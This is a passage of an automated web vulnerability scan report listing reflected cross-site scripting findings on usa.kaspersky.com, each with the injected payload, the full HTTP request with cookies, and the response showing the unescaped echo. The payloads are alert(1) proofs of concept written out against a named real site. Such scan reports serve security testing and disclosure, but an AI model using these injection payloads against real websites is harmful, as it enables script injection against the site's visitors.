<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
geName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock10988"-alert(1)-"4ffcedf6e1d/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.187. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a097"><script>alert(1)</script>1622e582d22 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock3a097"><script>alert(1)</script>1622e582d22/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:28:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139281"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:28:11 GMT
X-Varnish: 1163059373
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock3a097"><script>alert(1)</script>1622e582d22/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.188. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b2a7"><script>alert(1)</script>deb52bb8ed4 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home6b2a7"><script>alert(1)</script>deb52bb8ed4/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:30:00 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139400"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:30:12 GMT
X-Varnish: 1163062565
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home6b2a7"><script>alert(1)</script>deb52bb8ed4/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.189. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44d98"-alert(1)-"3bfb65bc033 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home44d98"-alert(1)-"3bfb65bc033/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:30:41 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139441"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:30:52 GMT
X-Varnish: 1163063693
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home44d98"-alert(1)-"3bfb65bc033/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.190. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f05ea"-alert(1)-"447b63679fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/default/files/f05ea"-alert(1)-"447b63679fe HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138942"
Content-Type: text/html; charset=utf-8
Content-Length: 37849
Date: Sun, 04 Sep 2011 12:22:27 GMT
X-Varnish: 1163050194
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/default/files/f05ea"-alert(1)-"447b63679fe";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.191. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6348"><script>alert(1)</script>ef3152fde57 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/default/files/d6348"><script>alert(1)</script>ef3152fde57 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138930"
Content-Type: text/html; charset=utf-8
Content-Length: 35264
Date: Sun, 04 Sep 2011 12:22:14 GMT
X-Varnish: 1163049785
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/default/files/d6348"><script>alert(1)</script>ef3152fde57" />
...[SNIP]...

1.192. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77e65"-alert(1)-"1a4299fe725 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites77e65"-alert(1)-"1a4299fe725/usa.kaspersky.com/files/204x50_product_6.jpg?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:31:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139468"
Content-Type: text/html; charset=utf-8
Content-Length: 29675
Date: Sun, 04 Sep 2011 12:31:19 GMT
X-Varnish: 1163064351
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites77e65"-alert(1)-"1a4299fe725/usa.kaspersky.com/files/204x50_product_6.jpg?1312840706";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.193. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50668"><script>alert(1)</script>7026b070ce2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites50668"><script>alert(1)</script>7026b070ce2/usa.kaspersky.com/files/204x50_product_6.jpg?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:30:34 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139434"
Content-Type: text/html; charset=utf-8
Content-Length: 29730
Date: Sun, 04 Sep 2011 12:30:54 GMT
X-Varnish: 1163063513
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites50668"><script>alert(1)</script>7026b070ce2/usa.kaspersky.com/files/204x50_product_6.jpg?1312840706" />
...[SNIP]...

1.194. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a958e"><script>alert(1)</script>d6121ecfb71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.coma958e"><script>alert(1)</script>d6121ecfb71/files/204x50_product_6.jpg?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:32:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139573"
Content-Type: text/html; charset=utf-8
Content-Length: 29730
Date: Sun, 04 Sep 2011 12:32:57 GMT
X-Varnish: 1163067273
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.coma958e"><script>alert(1)</script>d6121ecfb71/files/204x50_product_6.jpg?1312840706" />
...[SNIP]...

1.195. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc9f8"-alert(1)-"8fb20bcae2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.combc9f8"-alert(1)-"8fb20bcae2c/files/204x50_product_6.jpg?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:33:37 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139617"
Content-Type: text/html; charset=utf-8
Content-Length: 29675
Date: Sun, 04 Sep 2011 12:33:45 GMT
X-Varnish: 1163068443
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.combc9f8"-alert(1)-"8fb20bcae2c/files/204x50_product_6.jpg?1312840706";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.196. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a76"><script>alert(1)</script>728f084259e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files72a76"><script>alert(1)</script>728f084259e/204x50_product_6.jpg?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:35:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139718"
Content-Type: text/html; charset=utf-8
Content-Length: 29729
Date: Sun, 04 Sep 2011 12:35:27 GMT
X-Varnish: 1163070948
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files72a76"><script>alert(1)</script>728f084259e/204x50_product_6.jpg?1312840706" />
...[SNIP]...

1.197. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0fa3"-alert(1)-"d3bc9293f2f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/filesd0fa3"-alert(1)-"d3bc9293f2f/204x50_product_6.jpg?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:35:45 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139745"
Content-Type: text/html; charset=utf-8
Content-Length: 29675
Date: Sun, 04 Sep 2011 12:35:55 GMT
X-Varnish: 1163071597
Age: 0
Via: 1.1 varnish
Connection: keep-alive
